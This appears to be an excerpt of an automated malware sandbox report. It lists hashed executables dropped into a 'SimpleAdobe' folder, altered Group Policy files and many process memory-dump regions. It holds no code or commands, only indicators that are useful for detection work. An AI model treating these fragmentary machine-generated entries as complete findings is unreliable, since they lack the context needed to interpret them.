C:\Users\Admin\Documents\SimpleAdobe\aj9Gjz_zsnwG5_ngX31mN2Go.exeFilesize
500KB
MD5456a86d30c8506883a00bbafc9ab9ec3
SHA1f58d3f0c7f03f05e22998662e255e155bd8a74a4
SHA2569dc2cde8d123fbc1141cf3e4e47574ec0c7ed6d57e8815a7a5935a4427b803aa
SHA5124a3da93186fd6d33d14daf61955d253fc20b03c38e2a571dbda40f1b8ee0078bcb101fca11ead2e8087cfe5515e397c5343de37c8e4c1111506b44e33a049162
-
C:\Users\Admin\Documents\SimpleAdobe\bqS3WhD_TNek648LHXKaBteJ.exeFilesize
3.8MB
MD5f500af69b3efc5708420c2c024250d4d
SHA17656e267f56e4096d45b2d8aab071cff2c8b9acd
SHA2569a2c280d667a0121f1895a4ba77c44c9f54635d911929590be4dbfbaf21f0722
SHA512e2af4c51176641d81975c3213a49d3470b1a2db63bef3dccbc156adee7c1f4335190cfec7b691ee06e2be51bcfe27aac6a9cf2fdd5ab69247a8de868a2d8355c
-
C:\Users\Admin\Documents\SimpleAdobe\dC1IuctNFzvsh2zJSlXUiiJH.exeFilesize
289KB
MD5b262dcfba77dd333a3118ea3fad9e261
SHA145a80e16181291dda1d9230fbe1844f4e31c1f3a
SHA2568d842dca0b20df0b108e75db4cb0eb8d141ec475a987da516368a8989dee2899
SHA5121f981a0f5d48aceca307adcf9200443fb1083b36472cf002db91b1ca2255e00d2e43aa1c57395a10099549723e2c82508ea15aad40269656e6188a771cd0894f
-
C:\Users\Admin\Documents\SimpleAdobe\jAsAVdGVn7LASmN0xNIc2NDN.exeFilesize
3.9MB
MD543b8b44cc90aa0b9513702a26402225b
SHA10c1e6d5f190488bea9472f9b8061d07f3b922218
SHA25678c22b3f538154a69005679fd3bbc3dde64e86e1ad304611581f12dec806c3ac
SHA51226f434e4c73bbb3d20c63e01745f4072d1016740daf044856748a1500bf535842238cae74e79d62e01a0fb31a4ec3d075789f5149611909f0da79ceeb553ced3
-
C:\Users\Admin\Documents\SimpleAdobe\jnVWtmNX6wOSBntsy6FiTqMO.exeFilesize
4.2MB
MD5b544ae108c0ed5dd50e71d222ea2758c
SHA110de316b3888c6f76a90aeb414105a863a1a3ee6
SHA2567ef757a7b1696db11ea0c6c572eae75aea6df0c34c2565c93343d29dae3bd5e5
SHA512368ac7893a5e90726ec2c8f593ab42459e7972b3f56c6bbe4c781a882e452d81310521be17a5f8107b6eef953f29a0a80d45483b8a45512ba15171b5180177ff
-
C:\Users\Admin\Documents\SimpleAdobe\p6c2MG8zd1HDfVME7qpS6mk4.exeFilesize
4.2MB
MD5143c2a0edcebef4d3b44edf92f301367
SHA139f924848d34329d9f30c644a4f7d6905aee2912
SHA256734b5823f3d294582d01a3218ab96ca74a5055043f0e33c82d195ea069255d71
SHA5122f1d02a367e2baa9f2c92b515771f3d8166d9690175ba7dcaef9863e206b40b07ee4e3c5e364f8c31caeef47bc3e03726a55514c7eac4a9a3967866741c92848
-
C:\Users\Admin\Documents\SimpleAdobe\q_UzeWfqbzwnkPjohmajJ8uP.exeFilesize
449KB
MD50e8a51ab12ad932cc9a03ee216576989
SHA10ee74b9655a3436906c6a5c0bcdf851b48a9aec3
SHA256da585adb7fa00cf078230fc386c0330859d81c4f5e48961625f3a9a68b3b20d8
SHA512148d36c0c1ec691f0e3def8101dc86805e0d59d98fdc9a082f654d1d720f16f5359b1585e62e0832d6680cc0a7a6eb382c32b545a11d322687f3d996e3468987
-
C:\Users\Public\Desktop\Google Chrome.lnkFilesize
2KB
MD587741edbe29fb551cd17ac76cfd4b651
SHA13945e72f8713a8c6670078128894f6c5c585c654
SHA2569489af34ca584c4fcb3feb55469b221530fd19265b8b0b02d42ac9533e6edd6a
SHA5122aa27ef31821d4a272bcfee8e187384fddc457091fff41b38f328b1f3ad83f122fe34bb6c392dd6ed549fcbd669cdcd8caabe7827331705ea5f4b666214e5748
-
C:\Windows\System32\GroupPolicy\GPT.INIFilesize
127B
MD57cc972a3480ca0a4792dc3379a763572
SHA1f72eb4124d24f06678052706c542340422307317
SHA25602ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7
-
C:\Windows\System32\GroupPolicy\Machine\Registry.polFilesize
1KB
MD5cdfd60e717a44c2349b553e011958b85
SHA1431136102a6fb52a00e416964d4c27089155f73b
SHA2560ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8
-
C:\Windows\System32\GroupPolicy\gpt.iniFilesize
127B
MD58ef9853d1881c5fe4d681bfb31282a01
SHA1a05609065520e4b4e553784c566430ad9736f19f
SHA2569228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005
-
\??\pipe\crashpad_880_MWEPWWENOXIGPUPWMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/372-1815-0x0000000000F40000-0x00000000015C0000-memory.dmpFilesize
6.5MB
-
memory/372-390-0x0000000000F40000-0x00000000015C0000-memory.dmpFilesize
6.5MB
-
memory/372-442-0x0000000010000000-0x00000000105E8000-memory.dmpFilesize
5.9MB
-
memory/372-1179-0x0000000000F40000-0x00000000015C0000-memory.dmpFilesize
6.5MB
-
memory/888-368-0x0000000000400000-0x0000000000678000-memory.dmpFilesize
2.5MB
-
memory/888-369-0x0000000000400000-0x0000000000678000-memory.dmpFilesize
2.5MB
-
memory/888-379-0x0000000000400000-0x0000000000678000-memory.dmpFilesize
2.5MB
-
memory/2252-1322-0x0000000004E70000-0x00000000051C4000-memory.dmpFilesize
3.3MB
-
memory/2252-1332-0x0000000005590000-0x00000000055DC000-memory.dmpFilesize
304KB
-
memory/2268-691-0x00000000058F0000-0x0000000005A82000-memory.dmpFilesize
1.6MB
-
memory/2268-227-0x00000000055D0000-0x000000000566C000-memory.dmpFilesize
624KB
-
memory/2268-696-0x0000000005C10000-0x0000000005C20000-memory.dmpFilesize
64KB
-
memory/2268-218-0x0000000000910000-0x0000000000D48000-memory.dmpFilesize
4.2MB
-
memory/2500-377-0x0000000006650000-0x000000000668C000-memory.dmpFilesize
240KB
-
memory/2500-354-0x0000000006520000-0x000000000653E000-memory.dmpFilesize
120KB
-
memory/2500-229-0x0000000000400000-0x0000000000452000-memory.dmpFilesize
328KB
-
memory/2500-375-0x00000000066B0000-0x00000000067BA000-memory.dmpFilesize
1.0MB
-
memory/2500-382-0x00000000067C0000-0x000000000680C000-memory.dmpFilesize
304KB
-
memory/2500-676-0x00000000080F0000-0x000000000861C000-memory.dmpFilesize
5.2MB
-
memory/2500-675-0x00000000079F0000-0x0000000007BB2000-memory.dmpFilesize
1.8MB
-
memory/2500-376-0x00000000065F0000-0x0000000006602000-memory.dmpFilesize
72KB
-
memory/2500-519-0x00000000075D0000-0x0000000007620000-memory.dmpFilesize
320KB
-
memory/2500-367-0x0000000006B60000-0x0000000007178000-memory.dmpFilesize
6.1MB
-
memory/2500-411-0x0000000006900000-0x0000000006966000-memory.dmpFilesize
408KB
-
memory/2500-274-0x0000000005690000-0x0000000005C34000-memory.dmpFilesize
5.6MB
-
memory/2500-283-0x0000000005180000-0x0000000005212000-memory.dmpFilesize
584KB
-
memory/2500-295-0x0000000005130000-0x000000000513A000-memory.dmpFilesize
40KB
-
memory/2500-334-0x0000000005DC0000-0x0000000005E36000-memory.dmpFilesize
472KB
-
memory/3016-549-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/3016-550-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/3016-551-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/3016-552-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/3016-548-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/3044-512-0x0000000000400000-0x00000000004BD000-memory.dmpFilesize
756KB
-
memory/3456-1158-0x0000000000690000-0x0000000000B40000-memory.dmpFilesize
4.7MB
-
memory/3456-1149-0x0000000000690000-0x0000000000B40000-memory.dmpFilesize
4.7MB
-
memory/3472-259-0x0000019969000000-0x0000019969076000-memory.dmpFilesize
472KB
-
memory/3472-232-0x00000199685E0000-0x00000199685EA000-memory.dmpFilesize
40KB
-
memory/3472-231-0x00000199685F0000-0x0000019968602000-memory.dmpFilesize
72KB
-
memory/3472-197-0x0000019966940000-0x0000019966954000-memory.dmpFilesize
80KB
-
memory/3472-333-0x00000199686A0000-0x00000199686BE000-memory.dmpFilesize
120KB
-
memory/3472-230-0x00000199685C0000-0x00000199685CA000-memory.dmpFilesize
40KB
-
memory/3768-392-0x0000000000980000-0x00000000009FE953-memory.dmpFilesize
506KB
-
memory/3904-1190-0x0000000000970000-0x0000000000E40000-memory.dmpFilesize
4.8MB
-
memory/3904-1181-0x0000000000970000-0x0000000000E40000-memory.dmpFilesize
4.8MB
-
memory/3940-1293-0x00000123B9670000-0x00000123B9692000-memory.dmpFilesize
136KB
-
memory/3956-351-0x0000000140000000-0x0000000141A14000-memory.dmpFilesize
26.1MB
-
memory/3956-349-0x00007FFC12890000-0x00007FFC12892000-memory.dmpFilesize
8KB
-
memory/3976-216-0x0000000000B50000-0x00000000016A1000-memory.dmpFilesize
11.3MB
-
memory/3976-499-0x0000000000B50000-0x00000000016A1000-memory.dmpFilesize
11.3MB
-
memory/3976-1109-0x0000000000B50000-0x00000000016A1000-memory.dmpFilesize
11.3MB
-
memory/4004-1257-0x0000000000F40000-0x00000000015C0000-memory.dmpFilesize
6.5MB
-
memory/4004-1290-0x0000000000F40000-0x00000000015C0000-memory.dmpFilesize
6.5MB
-
memory/4004-674-0x0000000000F40000-0x00000000015C0000-memory.dmpFilesize
6.5MB
-
memory/4012-273-0x0000000000400000-0x0000000000DBA000-memory.dmpFilesize
9.7MB
-
memory/4012-511-0x0000000000400000-0x0000000000DBA000-memory.dmpFilesize
9.7MB
-
memory/4012-335-0x0000000000400000-0x0000000000DBA000-memory.dmpFilesize
9.7MB
-
memory/4012-233-0x0000000000400000-0x0000000000DBA000-memory.dmpFilesize
9.7MB
-
memory/4012-1107-0x0000000000400000-0x0000000000DBA000-memory.dmpFilesize
9.7MB
-
memory/4108-222-0x0000000000400000-0x0000000000643000-memory.dmpFilesize
2.3MB
-
memory/4108-220-0x0000000000400000-0x0000000000643000-memory.dmpFilesize
2.3MB
-
memory/4108-219-0x0000000000400000-0x0000000000643000-memory.dmpFilesize
2.3MB
-
memory/4152-134-0x00007FFC10074000-0x00007FFC10075000-memory.dmpFilesize
4KB
-
memory/4152-3-0x00007FFC10010000-0x00007FFC102D9000-memory.dmpFilesize
2.8MB
-
memory/4152-1877-0x0000000140000000-0x0000000140889000-memory.dmpFilesize
8.5MB
-
memory/4152-203-0x0000000140000000-0x0000000140889000-memory.dmpFilesize
8.5MB
-
memory/4152-1878-0x00007FFC10010000-0x00007FFC102D9000-memory.dmpFilesize
2.8MB
-
memory/4152-1-0x00007FFC10074000-0x00007FFC10075000-memory.dmpFilesize
4KB
-
memory/4152-136-0x0000000140000000-0x0000000140889000-memory.dmpFilesize
8.5MB
-
memory/4152-135-0x00007FFC10010000-0x00007FFC102D9000-memory.dmpFilesize
2.8MB
-
memory/4152-55-0x0000000140000000-0x0000000140889000-memory.dmpFilesize
8.5MB
-
memory/4152-12-0x00007FFC10010000-0x00007FFC102D9000-memory.dmpFilesize
2.8MB
-
memory/4152-2-0x00007FFC10010000-0x00007FFC102D9000-memory.dmpFilesize
2.8MB
-
memory/4152-4-0x00007FFC10010000-0x00007FFC102D9000-memory.dmpFilesize
2.8MB
-
memory/4152-0-0x0000000140000000-0x0000000140889000-memory.dmpFilesize
8.5MB
-
memory/4152-497-0x0000000140000000-0x0000000140889000-memory.dmpFilesize
8.5MB
-
memory/4160-1180-0x0000000000400000-0x0000000000678000-memory.dmpFilesize
2.5MB
-
memory/4160-391-0x0000000000400000-0x0000000000678000-memory.dmpFilesize
2.5MB
-
memory/4160-513-0x0000000000400000-0x0000000000678000-memory.dmpFilesize
2.5MB
-
memory/4192-263-0x0000000000940000-0x0000000000F0B000-memory.dmpFilesize
5.8MB
-
memory/4192-270-0x0000000000940000-0x0000000000F0B000-memory.dmpFilesize
5.8MB
-
memory/4192-500-0x0000000000940000-0x0000000000F0B000-memory.dmpFilesize
5.8MB
-
memory/4192-1089-0x0000000000940000-0x0000000000F0B000-memory.dmpFilesize
5.8MB
-
memory/4192-262-0x0000000000940000-0x0000000000F0B000-memory.dmpFilesize
5.8MB
-
memory/4192-261-0x0000000000940000-0x0000000000F0B000-memory.dmpFilesize
5.8MB
-
memory/4192-260-0x0000000000940000-0x0000000000F0B000-memory.dmpFilesize
5.8MB
-
memory/4192-234-0x0000000000940000-0x0000000000F0B000-memory.dmpFilesize
5.8MB
-
memory/4192-228-0x0000000000940000-0x0000000000F0B000-memory.dmpFilesize
5.8MB
-
memory/4192-235-0x0000000000940000-0x0000000000F0B000-memory.dmpFilesize
5.8MB
-
memory/4296-1411-0x0000000000970000-0x0000000000E40000-memory.dmpFilesize
4.8MB
-
memory/4296-1045-0x0000000000970000-0x0000000000E40000-memory.dmpFilesize
4.8MB
-
memory/4420-275-0x0000000000400000-0x0000000000E08000-memory.dmpFilesize
10.0MB
-
memory/4420-341-0x0000000000400000-0x0000000000E08000-memory.dmpFilesize
10.0MB
-
memory/4420-226-0x0000000000400000-0x0000000000E08000-memory.dmpFilesize
10.0MB
-
memory/4420-501-0x0000000000400000-0x0000000000E08000-memory.dmpFilesize
10.0MB
-
memory/4704-498-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/4704-185-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/5176-747-0x0000000000020000-0x00000000004F0000-memory.dmpFilesize
4.8MB
-
memory/5176-1047-0x0000000000020000-0x00000000004F0000-memory.dmpFilesize
4.8MB
-
memory/5492-2344-0x0000000007BB0000-0x0000000007BBA000-memory.dmpFilesize
40KB
-
memory/5492-2348-0x0000000007C10000-0x0000000007C1E000-memory.dmpFilesize
56KB
-
memory/5492-2349-0x0000000007C20000-0x0000000007C34000-memory.dmpFilesize
80KB
-
memory/5492-2345-0x0000000007BD0000-0x0000000007BE1000-memory.dmpFilesize
68KB
-
memory/5492-2343-0x0000000007AB0000-0x0000000007B53000-memory.dmpFilesize
652KB
-
memory/5492-2332-0x0000000073590000-0x00000000735DC000-memory.dmpFilesize
304KB
-
memory/5492-2342-0x0000000007A90000-0x0000000007AAE000-memory.dmpFilesize
120KB
-
memory/5492-2331-0x0000000007A50000-0x0000000007A82000-memory.dmpFilesize
200KB
-
memory/5492-2330-0x0000000007480000-0x00000000074C4000-memory.dmpFilesize
272KB
-
memory/5492-2329-0x0000000006600000-0x000000000664C000-memory.dmpFilesize
304KB
-
memory/5492-2319-0x0000000005D70000-0x00000000060C4000-memory.dmpFilesize
3.3MB
-
memory/5740-1289-0x0000000000660000-0x0000000000CE0000-memory.dmpFilesize
6.5MB
-
memory/5740-1818-0x0000000000660000-0x0000000000CE0000-memory.dmpFilesize
6.5MB
-
memory/6172-677-0x0000000004760000-0x0000000004AB4000-memory.dmpFilesize
3.3MB
-
memory/6284-699-0x0000000000400000-0x0000000000490000-memory.dmpFilesize
576KB
-
memory/6284-770-0x0000000008C40000-0x0000000008C8C000-memory.dmpFilesize
304KB
-
memory/6304-1403-0x00000000050C0000-0x000000000510C000-memory.dmpFilesize
304KB
-
memory/6304-1399-0x0000000004B80000-0x0000000004ED4000-memory.dmpFilesize
3.3MB
-
memory/6444-463-0x0000000005850000-0x0000000005E78000-memory.dmpFilesize
6.2MB
-
memory/6444-483-0x0000000006670000-0x000000000668E000-memory.dmpFilesize
120KB
-
memory/6444-462-0x0000000003090000-0x00000000030C6000-memory.dmpFilesize
216KB
-
memory/6444-475-0x00000000060A0000-0x00000000063F4000-memory.dmpFilesize
3.3MB
-
memory/6444-464-0x0000000005F20000-0x0000000005F42000-memory.dmpFilesize
136KB
-
memory/6444-465-0x0000000005FC0000-0x0000000006026000-memory.dmpFilesize
408KB
-
memory/6540-1568-0x0000000000AA0000-0x0000000001078000-memory.dmpFilesize
5.8MB
-
memory/6540-1246-0x0000000000AA0000-0x0000000001078000-memory.dmpFilesize
5.8MB
-
memory/6768-1835-0x00000000007E0000-0x0000000000C90000-memory.dmpFilesize
4.7MB
-
memory/6768-1178-0x00000000007E0000-0x0000000000C90000-memory.dmpFilesize
4.7MB
-
memory/6788-1126-0x0000000004270000-0x00000000045C4000-memory.dmpFilesize
3.3MB
-
memory/6788-1127-0x0000000004D10000-0x0000000004D5C000-memory.dmpFilesize
304KB
-
memory/6992-1042-0x00000000047D0000-0x0000000004B24000-memory.dmpFilesize
3.3MB
-
memory/7088-574-0x0000000006C50000-0x0000000006C6A000-memory.dmpFilesize
104KB
-
memory/7088-573-0x0000000007960000-0x00000000079F6000-memory.dmpFilesize
600KB
-
memory/7088-575-0x0000000006CA0000-0x0000000006CC2000-memory.dmpFilesize
136KB